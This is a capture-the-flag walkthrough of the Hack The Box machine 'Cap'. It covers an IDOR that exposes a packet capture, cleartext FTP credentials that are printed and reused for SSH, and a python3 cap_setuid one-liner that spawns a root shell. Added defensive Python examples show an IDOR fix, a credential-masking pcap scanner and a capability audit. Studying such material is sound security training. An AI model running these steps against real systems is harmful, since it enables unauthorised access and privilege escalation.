# Cap

OS: Linux

Difficulty: Easy

## Port Scanning

```
PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack vsftpd 3.0.3
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack gunicorn
```

### Checking out the website

![](https://user-images.githubusercontent.com/53917092/120903619-8acd6580-c61d-11eb-87c0-3faeb9725699.png)

Now we know that this site is used for network monitoring and that there is a user named Nathan.

Checking out "Security Snapshot"

![](https://user-images.githubusercontent.com/53917092/120903720-2b238a00-c61e-11eb-8ac9-de3df3a134dc.png)

This option redirects us to /data/1, where no traffic is logged. I changed the id in the URL to /data/0 and here we see that there is some recorded traffic: the id alone selects the capture, with nothing tying it to our own session (an IDOR).

![](https://user-images.githubusercontent.com/53917092/120903730-3c6c9680-c61e-11eb-876e-d2e75b072f81.png)

I clicked to download and got a file called 0.pcap, so I opened it with Wireshark.
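The /data/&lt;id&gt; behaviour above, as an added example that is not the box's app.py (which this writeup does not reproduce): a vulnerable download lookup beside an ownership-checked one, plus a per-user indirect reference map of the kind the OWASP cheat sheet linked below recommends. Everything here is constructed (the `CAPTURES` store, the users `nathan` and `guest`, the file paths) and modelled as plain functions so it runs without a web framework.

```python
"""Insecure direct object reference (IDOR) on a /data/<id> download route.

Added example, not the box's app.py: the vulnerable lookup, the
ownership-checked lookup and a per-user indirect reference map side by side.
All data below is constructed.
"""
import secrets

# Constructed store: numeric capture id -> owner and file path.
CAPTURES = {
    0: {"owner": "nathan", "path": "/var/captures/0.pcap"},
    1: {"owner": "guest", "path": "/var/captures/1.pcap"},
}


class Forbidden(Exception):
    """Raised for both 'not yours' and 'does not exist', so the response
    does not tell a caller which ids exist."""


def download_vulnerable(current_user, capture_id):
    """The IDOR: the id from the URL is the only thing that selects the object,
    so any logged-in user can walk /data/0, /data/1, ... and read every capture.
    current_user is accepted but never consulted."""
    return CAPTURES[capture_id]["path"]


def download_fixed(current_user, capture_id):
    """Authorization decided server-side from the session user, never from the URL."""
    capture = CAPTURES.get(capture_id)
    if capture is None or capture["owner"] != current_user:
        raise Forbidden(f"capture {capture_id} is not available to {current_user}")
    return capture["path"]


class ReferenceMap:
    """Per-user indirect references: the client only ever sees a random token,
    which resolves back to a capture id only for the user it was issued to."""

    def __init__(self):
        self._tokens = {}  # (user, token) -> capture_id

    def token_for(self, user, capture_id):
        if CAPTURES[capture_id]["owner"] != user:
            raise Forbidden(f"{user} may not reference capture {capture_id}")
        token = secrets.token_urlsafe(16)
        self._tokens[(user, token)] = capture_id
        return token

    def download(self, user, token):
        capture_id = self._tokens.get((user, token))
        if capture_id is None:
            raise Forbidden("unknown reference for this user")
        # Ownership is still re-checked: the map is an extra layer, not a replacement.
        return download_fixed(user, capture_id)


if __name__ == "__main__":
    print("vulnerable, guest reads nathan's capture:", download_vulnerable("guest", 0))
    try:
        download_fixed("guest", 0)
    except Forbidden as exc:
        print("fixed:", exc)
    refs = ReferenceMap()
    token = refs.token_for("nathan", 0)
    print("indirect reference resolves for its owner:", refs.download("nathan", token))
```

The ownership check is the actual fix; the reference map only removes the predictable numeric id from the URL and should sit on top of the check, not replace it.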

## User

![](https://user-images.githubusercontent.com/53917092/120903766-72aa1600-c61e-11eb-9f7a-8b7091209832.png)

In this file we can see a lot of useful information: the user's HTTP requests to the site, some plain TCP traffic and, most importantly, an FTP session, from which we can get Nathan's username and password for the FTP server.

Sorting the packets by protocol and navigating to the end of the file, we find this information.

![](https://user-images.githubusercontent.com/53917092/120903978-d4b74b00-c61f-11eb-9156-488ad5edc8d3.png)

user: nathan

password: Buck3tH4TF0RM3!
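The credential extraction described above, done with a script instead of Wireshark, as an added example that is not part of the writeup. It builds a small constructed capture in memory (one HTTP request and one cleartext FTP login with made-up credentials, not the box's 0.pcap), parses classic libpcap, Ethernet, IPv4 and TCP by hand with only the standard library, and reports each client-to-server FTP control stream that sent `USER` and `PASS`. The password is reported only as a length: the point of such an audit is to prove that credentials crossed the wire in cleartext, not to collect them.

```python
"""Scan a libpcap capture for cleartext FTP logins (USER/PASS sent to tcp/21).

Added example: standard library only, parses Ethernet/IPv4/TCP by hand and
reports the username of each cleartext login while masking the password.
The sample capture is constructed here, not the box's 0.pcap.
"""
import struct
from collections import defaultdict

PCAP_MAGIC_LE = b"\xd4\xc3\xb2\xa1"  # 0xa1b2c3d4 written little-endian
PCAP_MAGIC_BE = b"\xa1\xb2\xc3\xd4"
ETHERTYPE_IPV4 = 0x0800
IPPROTO_TCP = 6
FTP_PORT = 21


def _ipv4_bytes(dotted):
    return bytes(int(o) for o in dotted.split("."))


def _tcp_frame(src, dst, sport, dport, payload):
    """Ethernet + IPv4 + TCP frame with a raw payload (checksums left zero)."""
    eth = b"\x00" * 12 + struct.pack("!H", ETHERTYPE_IPV4)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64,
                     IPPROTO_TCP, 0, _ipv4_bytes(src), _ipv4_bytes(dst))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 65535, 0, 0)
    return eth + ip + tcp + payload


def build_sample_pcap():
    """Constructed capture: one HTTP request and one cleartext FTP login."""
    frames = [
        _tcp_frame("192.168.1.20", "192.168.1.10", 40100, 80, b"GET /data/0 HTTP/1.1\r\n\r\n"),
        _tcp_frame("192.168.1.10", "192.168.1.20", 21, 40200, b"220 (vsFTPd 3.0.3)\r\n"),
        _tcp_frame("192.168.1.20", "192.168.1.10", 40200, 21, b"USER alice\r\n"),
        _tcp_frame("192.168.1.20", "192.168.1.10", 40200, 21, b"PASS correct-horse-battery\r\n"),
        _tcp_frame("192.168.1.10", "192.168.1.20", 21, 40200, b"230 Login successful.\r\n"),
    ]
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)  # global header, LINKTYPE_ETHERNET
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1_600_000_000 + i, 0, len(frame), len(frame)) + frame
    return out


def iter_tcp_payloads(pcap_bytes):
    """Yield (src, sport, dst, dport, payload) for every IPv4/TCP record."""
    if pcap_bytes[:4] == PCAP_MAGIC_LE:
        end = "<"
    elif pcap_bytes[:4] == PCAP_MAGIC_BE:
        end = ">"
    else:
        raise ValueError("not a classic libpcap file (pcapng is not handled here)")
    if struct.unpack(end + "I", pcap_bytes[20:24])[0] != 1:
        raise ValueError("only Ethernet captures are supported")
    pos = 24
    while pos + 16 <= len(pcap_bytes):
        _, _, incl_len, _ = struct.unpack(end + "IIII", pcap_bytes[pos:pos + 16])
        frame = pcap_bytes[pos + 16:pos + 16 + incl_len]
        pos += 16 + incl_len
        if len(frame) < 34 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
            continue
        ihl = (frame[14] & 0x0F) * 4
        if frame[23] != IPPROTO_TCP:
            continue
        tcp = 14 + ihl
        sport, dport = struct.unpack("!HH", frame[tcp:tcp + 4])
        data_off = (frame[tcp + 12] >> 4) * 4
        src = ".".join(str(b) for b in frame[26:30])
        dst = ".".join(str(b) for b in frame[30:34])
        yield src, sport, dst, dport, frame[tcp + data_off:]


def find_cleartext_ftp_logins(pcap_bytes):
    """One finding per client->server FTP control stream that sent a cleartext PASS."""
    streams = defaultdict(dict)
    for src, sport, dst, dport, payload in iter_tcp_payloads(pcap_bytes):
        if dport != FTP_PORT:
            continue  # only client-to-server commands carry credentials
        for line in payload.split(b"\r\n"):
            verb, _, arg = line.partition(b" ")
            if verb.upper() == b"USER":
                streams[(src, sport, dst)]["user"] = arg.decode(errors="replace")
            elif verb.upper() == b"PASS":
                streams[(src, sport, dst)]["password_len"] = len(arg)  # masked on purpose
    return [
        {"client": src, "server": dst, "user": info.get("user"), "password_len": info["password_len"]}
        for (src, sport, dst), info in streams.items()
        if "password_len" in info
    ]


if __name__ == "__main__":
    for f in find_cleartext_ftp_logins(build_sample_pcap()):
        print(f"cleartext FTP login {f['client']} -> {f['server']}: user={f['user']!r}, "
              f"password length={f['password_len']}")
```

For a real file, `find_cleartext_ftp_logins(open("0.pcap", "rb").read())` does the same job; pcapng captures need converting first (editcap) or the equivalent tshark filter `ftp.request.command == "PASS"`. The finding a defender wants from this is that FTP on this host accepts logins in the clear at all; the fix is FTPS/SFTP, not a longer password.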

![](https://user-images.githubusercontent.com/53917092/120904027-3081d400-c620-11eb-98aa-a3050f5c64c8.png)

Logged in to the FTP server with these credentials, we can download the user flag by running

> get user.txt

We can also use these credentials to log in over SSH.

> ssh nathan@\<box\_ip>

> password: Buck3tH4TF0RM3!

## Privesc

After some simple enumeration, I saw that the file /var/www/html/app.py contained the line `os.setuid(1000)`. That led me to enumerate the binaries with capabilities that let a process change its own uid, including to 0 (root).

> getcap -r / 2>/dev/null

```
nathan@cap:~$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
```

We see that python3 holds cap_setuid, so it is allowed to change its own uid. We can run a one-liner that sets its uid to 0 and spawns a shell as root.

> python3 -c 'import os;os.setuid(0);os.system("bash")'
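The getcap listing above, assessed the way a hardening review would, as an added example that is not part of the writeup. `SAMPLE_GETCAP` reuses the box's output plus one constructed line in the newer `path cap=flags` format that recent libcap versions print; the severity ranking, the `ROOT_EQUIVALENT` set and the remediation string are this example's own convention, not output of getcap.

```python
"""Audit `getcap -r / 2>/dev/null` output for capabilities that grant root.

Added example, not part of the writeup: parses both getcap output formats,
flags capabilities that are equivalent to root, and treats interpreters as
critical because any local user who can run them gets the capability for free.
"""
import re

# File capabilities that let the holder become root or bypass file permissions.
ROOT_EQUIVALENT = {
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module",
    "cap_dac_override", "cap_dac_read_search", "cap_chown", "cap_fowner", "cap_setfcap",
}
# Interpreters run caller-supplied code, so a capability on them is a capability for everyone.
INTERPRETER_RE = re.compile(r"/(?:python|perl|ruby|php|lua|node)[0-9.]*$")
# Old format: "/path = caps+flags"; newer libcap: "/path caps=flags".
LINE_RE = re.compile(r"^(?P<path>\S+)(?:\s*=\s*|\s+)(?P<spec>\S+)$")
SPEC_RE = re.compile(r"^(?P<caps>[a-z0-9_,]+)[+=](?P<flags>[eip]+)$")
SEVERITY_ORDER = {"critical": 0, "high": 1, "info": 2}

# The box's listing, plus one constructed line in the newer output format.
SAMPLE_GETCAP = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/arping cap_net_raw=ep
"""


def parse_getcap(text):
    """Return [{'path', 'caps', 'flags'}] for each non-empty line of getcap output."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        spec = SPEC_RE.match(m["spec"]) if m else None
        if not spec:
            raise ValueError(f"unrecognised getcap line: {line!r}")
        entries.append({"path": m["path"], "caps": spec["caps"].split(","),
                        "flags": set(spec["flags"])})
    return entries


def assess(entries):
    """Rank each binary: critical = effective root-equivalent cap on an interpreter,
    high = root-equivalent cap on anything else, info = everything else."""
    findings = []
    for e in entries:
        dangerous = sorted(set(e["caps"]) & ROOT_EQUIVALENT)
        # Without 'e' the capability is only permitted and the program must raise it
        # itself; still worth a look, but not a one-liner away from root.
        effective = "e" in e["flags"]
        if dangerous and effective and INTERPRETER_RE.search(e["path"]):
            severity = "critical"
        elif dangerous:
            severity = "high"
        else:
            severity = "info"
        findings.append({
            "path": e["path"], "severity": severity, "dangerous": dangerous,
            "remediation": f"setcap -r {e['path']}" if dangerous else None,
        })
    return sorted(findings, key=lambda f: SEVERITY_ORDER[f["severity"]])


if __name__ == "__main__":
    for f in assess(parse_getcap(SAMPLE_GETCAP)):
        caps = ",".join(f["dangerous"]) or "-"
        print(f"{f['severity']:8} {f['path']}  {caps}  {f['remediation'] or ''}")
```

On this box the only critical finding is python3.8, which matches the writeup. The remediation is `setcap -r` on the system interpreter and then giving the service only what it needs: if the app only has to bind port 80 before dropping to uid 1000, cap_net_bind_service alone on a dedicated copy of the interpreter (or on the service binary) is the least-privilege grant; cap_setuid on the shared python3 hands every local user a root shell.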

![](https://user-images.githubusercontent.com/53917092/120905497-c588cb00-c628-11eb-844a-11d9761b9458.png)

## Helpful links

### Web

* [portswigger](https://portswigger.net/web-security/access-control/idor)
* [geeksforgeeks](https://www.geeksforgeeks.org/insecure-direct-object-reference-idor-vulnerability/)
* [owasp](https://cheatsheetseries.owasp.org/cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html)
* [hacktricks](https://book.hacktricks.xyz/pentesting-web/idor)

### User

* [hacktricks - wireshark](https://book.hacktricks.xyz/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks)
* [hacktricks - pentesting FTP](https://book.hacktricks.xyz/pentesting/pentesting-ftp)

### Privesc

* [hacktricks - linux privesc](https://book.hacktricks.xyz/linux-unix/privilege-escalation)
* [GTFOBins - python](https://gtfobins.github.io/gtfobins/python/)
